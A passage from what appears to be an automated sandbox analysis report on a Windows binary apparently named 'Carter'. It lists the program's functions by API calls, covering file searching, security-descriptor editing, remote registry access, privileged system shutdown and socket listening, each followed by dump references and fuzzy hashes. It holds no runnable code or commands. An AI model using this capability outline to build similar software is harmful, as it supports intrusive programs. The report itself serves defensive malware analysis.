                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0104F7D8
                                                                        • _wcscmp.LIBCMT ref: 0104F7FF
                                                                        • _wcscmp.LIBCMT ref: 0104F816
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0104F828
                                                                        • SetCurrentDirectoryW.KERNEL32(0109B578), ref: 0104F846
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0104F850
                                                                        • FindClose.KERNEL32(00000000), ref: 0104F85D
                                                                        • FindClose.KERNEL32(00000000), ref: 0104F86F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                        • String ID: *.*
                                                                        • API String ID: 1824444939-438819550
                                                                        • Opcode ID: 32fb81d993a6c3c49beef8397f3f7b8653ee2448555faca7a4317cebd94f10b9
                                                                        • Instruction ID: ebef6e2cc819c19458e8f33b610ad50dbd183c478bab178c7fde2af0d5ae271a
                                                                        • Opcode Fuzzy Hash: 32fb81d993a6c3c49beef8397f3f7b8653ee2448555faca7a4317cebd94f10b9
                                                                        • Instruction Fuzzy Hash: DE31A97290121F6BFF21DABDDCC8ADE77ACAF16221F1001A9F984E6190DB35DA45CB50
                                                                        Function 010388CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01038E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01038E3C
                                                                          • Part of subcall function 01038E20: GetLastError.KERNEL32(?,01038900,?,?,?), ref: 01038E46
                                                                          • Part of subcall function 01038E20: GetProcessHeap.KERNEL32(00000008,?,?,01038900,?,?,?), ref: 01038E55
                                                                          • Part of subcall function 01038E20: HeapAlloc.KERNEL32(00000000,?,01038900,?,?,?), ref: 01038E5C
                                                                          • Part of subcall function 01038E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 01038E73
                                                                          • Part of subcall function 01038EBD: GetProcessHeap.KERNEL32(00000008,01038916,00000000,00000000,?,01038916,?), ref: 01038EC9
                                                                          • Part of subcall function 01038EBD: HeapAlloc.KERNEL32(00000000,?,01038916,?), ref: 01038ED0
                                                                          • Part of subcall function 01038EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,01038916,?), ref: 01038EE1
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01038931
                                                                        • _memset.LIBCMT ref: 01038946
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01038965
                                                                        • GetLengthSid.ADVAPI32(?), ref: 01038976
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 010389B3
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 010389CF
                                                                        • GetLengthSid.ADVAPI32(?), ref: 010389EC
                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 010389FB
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 01038A02
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01038A23
                                                                        • CopySid.ADVAPI32(00000000), ref: 01038A2A
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01038A5B
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01038A81
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 01038A95
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                        • String ID:
                                                                        • API String ID: 3996160137-0
                                                                        • Opcode ID: 71b89c731774f62e420180cc4acb216aa9f142a7cfd6ec6483b7731fd7ea105c
                                                                        • Instruction ID: cd3d99fe99d6435263c8afd252c8c0367f21e03c3fe1d7d84dc4f39276b7848a
                                                                        • Opcode Fuzzy Hash: 71b89c731774f62e420180cc4acb216aa9f142a7cfd6ec6483b7731fd7ea105c
                                                                        • Instruction Fuzzy Hash: E1616D7190010ABFEF15DF95DC44EEEBBB9FF45310F04829AF995A6280D7399A05CB60
                                                                        Function 01060A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0106147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0106040D,?,?), ref: 01061491
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01060B0C
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 01060BAB
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 01060C43
                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01060E82
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 01060E8F
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 1240663315-0
                                                                        • Opcode ID: e87493a2f34ad73c34c9de207974f84b53a5d0fe58aade03d68a33846f57dae4
                                                                        • Instruction ID: 12fc864abf2b5fa96a4eaae477caf7cc63086c9df18b8c95e2479cac429114fe
                                                                        • Opcode Fuzzy Hash: e87493a2f34ad73c34c9de207974f84b53a5d0fe58aade03d68a33846f57dae4
                                                                        • Instruction Fuzzy Hash: F4E17C31204214AFC725DF29CC84E2EBBE9FF89314F04856DF589DB2A5DA35E801CB52
                                                                        Function 0104443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __swprintf.LIBCMT ref: 01044451
                                                                        • __swprintf.LIBCMT ref: 0104445E
                                                                          • Part of subcall function 010038C8: __woutput_l.LIBCMT ref: 01003921
                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 01044488
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 01044494
                                                                        • LockResource.KERNEL32(00000000), ref: 010444A1
                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 010444C1
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 010444D3
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 010444E2
                                                                        • LockResource.KERNEL32(?), ref: 010444EE
                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0104454F
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                        • String ID:
                                                                        • API String ID: 1433390588-0
                                                                        • Opcode ID: c13dea57d81e5ae1a400df2f7ea34aad35cf95f9680ad8d0abdbe3c17e4fb3fd
                                                                        • Instruction ID: cc9539397eb20a388d7716daed1bec77cb1039fb1afaa0d1cb5f19fadd54f2f9
                                                                        • Opcode Fuzzy Hash: c13dea57d81e5ae1a400df2f7ea34aad35cf95f9680ad8d0abdbe3c17e4fb3fd
                                                                        • Instruction Fuzzy Hash: 9631AEB190021AAFEF219F60EC84ABF7BB8FB05341F004565F981E6149DB39D921CBA0
                                                                        Function 01054830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                        • String ID:
                                                                        • API String ID: 1737998785-0
                                                                        • Opcode ID: 7394f484a1b1ead73b21652b7d1904a2b1a4ccc25cea3af58ff0fdbec2a7e2fd
                                                                        • Instruction ID: 3de9c9d3d6e618bb9bd51d9b89b20d50d06ca42faf6436419d42b73d515d889f
                                                                        • Opcode Fuzzy Hash: 7394f484a1b1ead73b21652b7d1904a2b1a4ccc25cea3af58ff0fdbec2a7e2fd
                                                                        • Instruction Fuzzy Hash: 562127317012019FEB22AF24EC19B6E77A8EF88720F008119F9C5EB295DB39AC41CB50
                                                                        Function 0104FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0104FA83
                                                                        • FindClose.KERNEL32(00000000), ref: 0104FB96
                                                                          • Part of subcall function 00FE52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE52E6
                                                                        • Sleep.KERNEL32(0000000A), ref: 0104FAB3
                                                                        • _wcscmp.LIBCMT ref: 0104FAC7
                                                                        • _wcscmp.LIBCMT ref: 0104FAE2
                                                                        • FindNextFileW.KERNEL32(?,?), ref: 0104FB80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                        • String ID: *.*
                                                                        • API String ID: 2185952417-438819550
                                                                        • Opcode ID: e27da486dc5078053c360937336c09e492a467f8e4cc000a36b09e796e81b27a
                                                                        • Instruction ID: 367ec3279c812030bc4aa2cb25f1049a443d604e7d1986d08d3fc3e9dfed7dbc
                                                                        • Opcode Fuzzy Hash: e27da486dc5078053c360937336c09e492a467f8e4cc000a36b09e796e81b27a
                                                                        • Instruction Fuzzy Hash: 8841B4B190021F9FDF65EF68CC94AEEBBB4FF05310F1445A5E954A22A0EB359E44CB90
                                                                        Function 01045778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01039399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 010393E3
                                                                          • Part of subcall function 01039399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01039410
                                                                          • Part of subcall function 01039399: GetLastError.KERNEL32 ref: 0103941D
                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 010457B4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                        • String ID: $@$SeShutdownPrivilege
                                                                        • API String ID: 2234035333-194228
                                                                        • Opcode ID: 1eb2396a16ea844d8839aabb959e49a7bc31e6d8f7b37853854264c2e239803e
                                                                        • Instruction ID: dbd010b7839d2cdf16f6eac532523acf2f978393d5d5ba29a4307987f259c4d6
                                                                        • Opcode Fuzzy Hash: 1eb2396a16ea844d8839aabb959e49a7bc31e6d8f7b37853854264c2e239803e
                                                                        • Instruction Fuzzy Hash: A10184B1A50312EBF769E168BCCBBBF7A98BB05650F1445B9F9D3E60D1D9515C008150
                                                                        Function 0105696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010569C7
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 010569D6
                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 010569F2
                                                                        • listen.WSOCK32(00000000,00000005), ref: 01056A01
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 01056A1B
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 01056A2F
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                        • String ID:
                                                                        • API String ID: 1279440585-0
                                                                        • Opcode ID: 0e785b99db6579c0b8778c103ad013e0e4abc762b9a88bf6ae4f355a3133bef2
                                                                        • Instruction ID: 89992579c02d955f48a9b7203b4ebbc00f3b8be3fac33e0c681033ebe23d7e99
                                                                        • Opcode Fuzzy Hash: 0e785b99db6579c0b8778c103ad013e0e4abc762b9a88bf6ae4f355a3133bef2
                                                                        • Instruction Fuzzy Hash: 8A2101346002019FCB60EF69CC88A6EB7F9EF45720F048658FD96A7385CB75AC01CB91
                                                                        Function 00FE1663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00FE1DD6
                                                                        • GetSysColor.USER32(0000000F), ref: 00FE1E2A
                                                                        • SetBkColor.GDI32(?,00000000), ref: 00FE1E3D
                                                                          • Part of subcall function 00FE166C: DefDlgProcW.USER32(?,00000020,?), ref: 00FE16B4
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ColorProc$LongWindow
                                                                        • String ID:
                                                                        • API String ID: 3744519093-0
                                                                        • Opcode ID: f93c0df001c816f2356e759594dadca315ddae09c97201618a4df614375e2bde
                                                                        • Instruction ID: 92958590e8fecf585a87a849b2a0bb04a25fbdd147ffa8cb9869fcba1abb4944
                                                                        • Opcode Fuzzy Hash: f93c0df001c816f2356e759594dadca315ddae09c97201618a4df614375e2bde
                                                                        • Instruction Fuzzy Hash: FDA15771505489BAE63C6A6F8C44FBF39ADFB42311F50420AF5C2D6189DA3A9D01F276
                                                                        Function 0104C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0104C329
                                                                        • _wcscmp.LIBCMT ref: 0104C359
                                                                        • _wcscmp.LIBCMT ref: 0104C36E
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0104C37F
                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0104C3AF
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 2387731787-0
                                                                        • Opcode ID: df2ada338395c2ff4c9e58be92a34986a8deba5c5bf4f44eb885e8cb859cacec
                                                                        • Instruction ID: 4abb1080118fa518a15a901771385c1175daa4b3a83317b27f81adbc31cfd8a1
                                                                        • Opcode Fuzzy Hash: df2ada338395c2ff4c9e58be92a34986a8deba5c5bf4f44eb885e8cb859cacec
                                                                        • Instruction Fuzzy Hash: 54519C756046028FE714DF68C9C0AAAB7E4FF49320F00466DF996CB3A1DB30A901CB91
                                                                        Function 01056E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01058475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010584A0
                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 01056E89
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 01056EB2
                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 01056EEB
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 01056EF8
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 01056F0C
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 99427753-0
                                                                        • Opcode ID: 63cf0dfbb5fd6e80d62bd2f07f06084703fe9bbf46909a5ce75bb573be1161d9
                                                                        • Instruction ID: 22836b8b4bd38dd12400fc43a76b09eb23725b4a76b973d355fe2fb4b383c93c
                                                                        • Opcode Fuzzy Hash: 63cf0dfbb5fd6e80d62bd2f07f06084703fe9bbf46909a5ce75bb573be1161d9
                                                                        • Instruction Fuzzy Hash: BE410675A00200AFDB20AF69DC86F7E77E8DF44710F44855CFA45AB3C2CA78AD019BA1
                                                                        Function 010659B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                        • String ID:
                                                                        • API String ID: 292994002-0
                                                                        • Opcode ID: 5615bf71aa66ac1260ec9488d0fd8eb5159b81f041e00595025bad1a0bfb6b46
                                                                        • Instruction ID: 0d925d5660240380abf43ab3a683a8097ba1db5f66eaaaac59e5c95eaaa2d367
                                                                        • Opcode Fuzzy Hash: 5615bf71aa66ac1260ec9488d0fd8eb5159b81f041e00595025bad1a0bfb6b46
                                                                        • Instruction Fuzzy Hash: A91104327006115FE7315F2A8C84A2EBBDDFF857A0F004129F885E7241DB74E9018BE0
                                                                        Function 01020030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LocalTime__swprintf
                                                                        • String ID: %.3d$WIN_XPe
                                                                        • API String ID: 2070861257-2409531811
                                                                        • Opcode ID: d28653b7f872bdadde620c754a1356004c2ca022673313cefcdf511b6545b03d
                                                                        • Instruction ID: 245d9a57e8bf1daaa235d7fb44b75fc38d9601fa6f9bde7d0e665d2dbe7d9b33
                                                                        • Opcode Fuzzy Hash: d28653b7f872bdadde620c754a1356004c2ca022673313cefcdf511b6545b03d
                                                                        • Instruction Fuzzy Hash: 65D01272818329EADB159A91CCC4CFD777CBB04100F004496F5C6E2048E27997589B22
                                                                        Function 01044365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 01044385
                                                                        • _memset.LIBCMT ref: 010443A6
                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 010443F8
                                                                        • CloseHandle.KERNEL32(00000000), ref: 01044401
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
